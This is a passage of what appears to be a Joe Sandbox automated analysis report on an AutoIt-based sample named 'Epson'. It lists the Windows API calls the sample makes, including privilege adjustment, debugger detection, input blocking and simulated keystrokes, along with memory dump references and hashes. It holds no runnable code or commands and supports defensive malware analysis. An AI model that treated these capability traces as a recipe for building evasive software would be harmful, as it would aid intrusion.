                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C21F431B002958FD7509F27CC84B1A7BE9FF84324F198069E8498B351EB71ED42EB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00FCD8CE
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00FCD92F
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00FCD943
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 234945975-0
                                                                                                                                                                                                                                      • Opcode ID: c49950354bf579a1c6ba732a86cc748a2dd2fafb3f34653c171e7c2ccd2bcae9
                                                                                                                                                                                                                                      • Instruction ID: 3e8711619f405b3898b037391084ef91db69579c38d35cee83a2191fe7d78704
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c49950354bf579a1c6ba732a86cc748a2dd2fafb3f34653c171e7c2ccd2bcae9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F321AF76900706AFE7209F65CE86FAAB7FCEB41324F10442EE64696941E774EA04EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,00F946AC), ref: 00FBE482
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FBE491
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FBE4A2
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00FBE4AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2695905019-0
                                                                                                                                                                                                                                      • Opcode ID: 324c435c7d224a3d50cee5fc9d4d400975b94093fe64d85543cce9245ff1ba26
                                                                                                                                                                                                                                      • Instruction ID: 4bb24fe3a4ec4f6306ae84422b94fa2d41fc98b167be912788af73c7a12ae6d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 324c435c7d224a3d50cee5fc9d4d400975b94093fe64d85543cce9245ff1ba26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FBF0E5398109149BD210A73CAC4D8EB776EAE02335B504701F936C64F0D7789D95BA95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LocalTime
                                                                                                                                                                                                                                      • String ID: %.3d$X64
                                                                                                                                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                      • Opcode ID: 261e6bc49cce0f9df52ec9e5905f5bde64e66ce221b9bb818389378552e329de
                                                                                                                                                                                                                                      • Instruction ID: ddc7e989b2f3b0f325292fbaa91938c23abab8f3205a26c07fc36b8481010660
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 261e6bc49cce0f9df52ec9e5905f5bde64e66ce221b9bb818389378552e329de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5D05BF7C1410CD6CBC0DB909D88EB9737CBB29300F148C56F906D1100E6349908BF21
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F82A8A
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F82A94
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F82AA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 1359aac43e6c7591e27d8b10d601e7d904d6b250ea2c7f9e43dc1cbf7434ab09
                                                                                                                                                                                                                                      • Instruction ID: 2b996cf2874a17b56758e5c2757bd5d3ea1c8eee6b9c4ed7fb1798a209993f10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1359aac43e6c7591e27d8b10d601e7d904d6b250ea2c7f9e43dc1cbf7434ab09
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6031D57490122C9BCB61DF68DD887DCBBB8AF08310F5081DAE80CA6250EB349F859F45
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F7014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F709D8
                                                                                                                                                                                                                                        • Part of subcall function 00F7014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F709F5
                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FB205A
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FB2087
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FB2097
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 577356006-0
                                                                                                                                                                                                                                      • Opcode ID: b0a02f0d6aa6987a693349fc792688629e3f76ba3e13b355bb6790250b324656
                                                                                                                                                                                                                                      • Instruction ID: 833cd2d99a149c97085903c7babb0b5fe7879e7a04ee6ce0561be9ee083e34c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0a02f0d6aa6987a693349fc792688629e3f76ba3e13b355bb6790250b324656
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8211BFB2400204AFD718AF54DCC6E6BB7B8EF04750B20852EF05A57251DB70BC41DB20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00F7502E,?,010198D8,0000000C,00F75185,?,00000002,00000000), ref: 00F75079
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00F7502E,?,010198D8,0000000C,00F75185,?,00000002,00000000), ref: 00F75080
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00F75092
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: dbae4283a56f96119a29e4dca89389019d487af5d88788b6bbe35dbcb38e44db
                                                                                                                                                                                                                                      • Instruction ID: 6353721cb622407392082ea87ef75a56902c53932dd3e3dfa085b422ba775341
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbae4283a56f96119a29e4dca89389019d487af5d88788b6bbe35dbcb38e44db
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7E08C3140068CAFCF216F50CD48E483B6AEF10B91F008014F8098E531DB7AED52EBC1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00FBED04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                      • String ID: DOWN
                                                                                                                                                                                                                                      • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                      • Opcode ID: c0332242f7f5fc1e508a21fcc55dd69160a7392baeaefdecc9a8248bf968f679
                                                                                                                                                                                                                                      • Instruction ID: 1293e27fa3ddc05f5b9f03cfb13007f01f7345fe9e314755a9173e43a6fae753
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0332242f7f5fc1e508a21fcc55dd69160a7392baeaefdecc9a8248bf968f679
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12E086A619D72538F91421157C06EF6234CAF16734711414BF840E80C4EE986C41B4A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00FAE664
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                      • String ID: X64
                                                                                                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                      • Opcode ID: 149c874673d2a8c82e2b1a7c4a50e633229b8d521e7f4aa97dca2ea066f83f1d
                                                                                                                                                                                                                                      • Instruction ID: e73a57ed10275e1d83d7ba347aa4a8f5ebe3035ee8897e60934a49bda96b12ff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 149c874673d2a8c82e2b1a7c4a50e633229b8d521e7f4aa97dca2ea066f83f1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9D0C9FA81111DEACB80CB60ECC8ED9737CBB04304F100A51F106A2100DB30A548AF10
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00FD52EE,?,?,00000035,?), ref: 00FC4229
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00FD52EE,?,?,00000035,?), ref: 00FC4239
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3479602957-0
                                                                                                                                                                                                                                      • Opcode ID: 80b97d4f4b7cba16b2e008ba1cfe64489448086a70ba01ded9fefc2ee9958a57
                                                                                                                                                                                                                                      • Instruction ID: 2b578b7ba152d8f0b7f8403f4e4b9044a2a705ac9906712e36c2780f4d14bd63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80b97d4f4b7cba16b2e008ba1cfe64489448086a70ba01ded9fefc2ee9958a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2F0E5316002296AEB2017659C4EFEB766DEFC5761F000179F609D2181D9709904E6B0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00FBBC24
                                                                                                                                                                                                                                      • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00FBBC37
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3536248340-0
                                                                                                                                                                                                                                      • Opcode ID: 72476bfb4dfc4dc9928a5559382607506a246ca0fa5032cf89332dc0a2384b8c
                                                                                                                                                                                                                                      • Instruction ID: d6b60831235dee042346f94dbadddc2ab7d6d3781ce31fad00dd5abaade07ac9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72476bfb4dfc4dc9928a5559382607506a246ca0fa5032cf89332dc0a2384b8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66F06D7180028DABDB01DFA1C805BFE7FB0FF04309F048009F951A9192C7B98201EF94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FB1B48), ref: 00FB1A20
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00FB1B48), ref: 00FB1A35
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 81990902-0
                                                                                                                                                                                                                                      • Opcode ID: c225c26d33552e3fadbd6a175867eef6ae60413dcd831425208c502bcf5c76a1
                                                                                                                                                                                                                                      • Instruction ID: 087d1d1233bc8850de16574d84f4537f0c140c9c11e012c81e3a6290dbd21736
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c225c26d33552e3fadbd6a175867eef6ae60413dcd831425208c502bcf5c76a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CE0BF72014614EFF7252B11FC45F76B7A9FF04321F14892EF5A5844B0DBA66C91EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00FCF51A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                      • Opcode ID: 55b5ede39a444a3e9685f54c600a0d00657b2e65050d4d8ebee4b491748085ad
                                                                                                                                                                                                                                      • Instruction ID: 1225b824f772224c3401b3421508789e385af94517dd781113530dcd6f1da146
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55b5ede39a444a3e9685f54c600a0d00657b2e65050d4d8ebee4b491748085ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71E0D8322002059FC7109F69D801E86F7D8AFA4361F048429FD4ACB311C674F9449B90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00F7075E), ref: 00F70D4A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                                      • Opcode ID: fceccaacda007f2fa5c33f4db2ac861a8ab5977a8ca7ae13aec163db4416d525
                                                                                                                                                                                                                                      • Instruction ID: d40c843bd38749763646a7d8177d7554f14b9048916154c2a804058a243f13f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fceccaacda007f2fa5c33f4db2ac861a8ab5977a8ca7ae13aec163db4416d525
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00FD358D
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00FD35A0
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00FD35AF
                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00FD35CA
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00FD35D1
                                                                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00FD3700
                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00FD370E
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD3755
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00FD3761
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FD379D
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD37BF
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD37D2
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD37DD
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FD37E6
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD37F5
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FD37FE
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD3805
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00FD3810
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FD3822
